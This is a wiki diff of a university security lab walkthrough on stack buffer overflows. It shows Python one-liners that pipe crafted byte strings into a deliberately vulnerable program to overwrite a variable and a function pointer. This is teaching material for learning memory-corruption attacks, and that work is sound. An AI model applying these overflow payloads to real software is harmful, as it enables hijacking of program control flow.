Differences
This shows you the differences between two versions of the page.
|
cns:labs:lab-03 [2020/10/26 19:01] dennis.plosceanu [Resources] |
cns:labs:lab-03 [2022/10/24 19:05] (current) mihai.dumitru2201 [2. Overflow a Pointer] |
||
|---|---|---|---|
| Line 134: | Line 134: | ||
| Let's first automate the delivery of input to the buffer by using Python. Let's write 16 bytes of ''A'' characters:<code> | Let's first automate the delivery of input to the buffer by using Python. Let's write 16 bytes of ''A'' characters:<code> | ||
| - | python -c 'print(16*"A")' | ./overflow_ptr | + | python -c 'import sys; sys.stdout.buffer.write(16*b"A")' | ./overflow_ptr |
| Provide buffer input: Dumb number value is 0x12345678. | Provide buffer input: Dumb number value is 0x12345678. | ||
| Buffer is AAAAAAAAAAAAAAAA | Buffer is AAAAAAAAAAAAAAAA | ||
| Line 143: | Line 143: | ||
| Let's now increase the number of bytes we are writing to 30, then 35, then 36:<code> | Let's now increase the number of bytes we are writing to 30, then 35, then 36:<code> | ||
| - | student@host:~/cns/labs/03-stack-buffer-management/02-overflow-ptr $ python -c 'print(30*"A")' | ./overflow_ptr | + | student@host:~/cns/labs/03-stack-buffer-management/02-overflow-ptr $ python -c 'import sys; sys.stdout.buffer.write(30*b"A")' | ./overflow_ptr |
| Provide buffer input: Dumb number value is 0x12345678. | Provide buffer input: Dumb number value is 0x12345678. | ||
| Buffer is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA | Buffer is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA | ||
| Knock, knock! Who's there? Recursion. Recursion who? Knock, knock! | Knock, knock! Who's there? Recursion. Recursion who? Knock, knock! | ||
| - | student@host:~/cns/labs/03-stack-buffer-management/02-overflow-ptr $ python -c 'print(35*"A")' | ./overflow_ptr | + | student@host:~/cns/labs/03-stack-buffer-management/02-overflow-ptr $ python -c 'import sys; sys.stdout.buffer.write(35*b"A")' | ./overflow_ptr |
| Provide buffer input: Dumb number value is 0x12345600. | Provide buffer input: Dumb number value is 0x12345600. | ||
| Buffer is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA | Buffer is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA | ||
| Knock, knock! Who's there? Recursion. Recursion who? Knock, knock! | Knock, knock! Who's there? Recursion. Recursion who? Knock, knock! | ||
| - | student@host:~/cns/labs/03-stack-buffer-management/02-overflow-ptr $ python -c 'print(36*"A")' | ./overflow_ptr | + | student@host:~/cns/labs/03-stack-buffer-management/02-overflow-ptr $ python -c 'import sys; sys.stdout.buffer.write(36*b"A")' | ./overflow_ptr |
| Provide buffer input: Dumb number value is 0x1234000a. | Provide buffer input: Dumb number value is 0x1234000a. | ||
| Buffer is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA | Buffer is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA | ||
| Line 167: | Line 167: | ||
| Now let's try to write more, let's go one byte after the ''dumb_number variable'' by writing 39 bytes: 36 bytes for the buffer, 3 bytes for the ''dumb_number'' variable, 1 byte for the newline and one byte for the NUL-byte going further than the ''dumb_number'' variable:<code> | Now let's try to write more, let's go one byte after the ''dumb_number variable'' by writing 39 bytes: 36 bytes for the buffer, 3 bytes for the ''dumb_number'' variable, 1 byte for the newline and one byte for the NUL-byte going further than the ''dumb_number'' variable:<code> | ||
| - | student@host:~/cns/labs/03-stack-buffer-management/02-overflow-ptr $ python -c 'print(39*"A")' | ./overflow_ptr | + | student@host:~/cns/labs/03-stack-buffer-management/02-overflow-ptr $ python -c 'import sys; sys.stdout.buffer.write(39*b"A")' | ./overflow_ptr |
| Provide buffer input: Dumb number value is 0x0a414141. | Provide buffer input: Dumb number value is 0x0a414141. | ||
| Buffer is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA | Buffer is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA | ||
| Line 173: | Line 173: | ||
| Let's see what happens if we overwrite more data, we write ''41'' bytes:<code> | Let's see what happens if we overwrite more data, we write ''41'' bytes:<code> | ||
| - | student@host:~/cns/labs/03-stack-buffer-management/02-overflow-ptr $ python -c 'print(41*"A")' | ./overflow_ptr | + | student@host:~/cns/labs/03-stack-buffer-management/02-overflow-ptr $ python -c 'import sys; sys.stdout.buffer.write(41*b"A")' | ./overflow_ptr |
| Provide buffer input: Dumb number value is 0x41414141. | Provide buffer input: Dumb number value is 0x41414141. | ||
| Buffer is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA | Buffer is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA | ||
| Line 186: | Line 186: | ||
| We now see that we've overwritten three bytes of the ''f_ptr'' function pointer that we jump to: ''0x00'' (the NUL byte), ''0x0a'' (the newline), and ''0x41'' (one of the 41 ''A'' characters we've written). | We now see that we've overwritten three bytes of the ''f_ptr'' function pointer that we jump to: ''0x00'' (the NUL byte), ''0x0a'' (the newline), and ''0x41'' (one of the 41 ''A'' characters we've written). | ||
| - | Let's see how we could write some random hex data. Let's overwrite the ''dumb_number'' value with ''0x87654321'', that is the reverse of how it currently is. We will write ''32'' bytes of ''A'' and another eight properly arranged bytes to overwrite the ''dumb_number'' variable:<code> | + | Let's see how we could write some random hex data. Let's overwrite the ''dumb_number'' value with ''0x87654321'', that is the reverse of how it currently is. We will write ''32'' bytes of ''A'' and another eight properly arranged bytes to overwrite the ''dumb_number'' variable: |
| - | $ python -c 'import sys; sys.stdout.buffer.write(32*b"A" + b"\x00\x00\x00\x00\x21\x43\x65\x87")' | ./overflow_ptr | + | <code> |
| + | |||
| + | $ python -c 'import sys; sys.stdout.buffer.write(32*b"A" + b"\x21\x43\x65\x87\x00\x00\x00\x00")' | ./overflow_ptr | ||
| Provide buffer input: Dumb number value is 0x87654321. | Provide buffer input: Dumb number value is 0x87654321. | ||
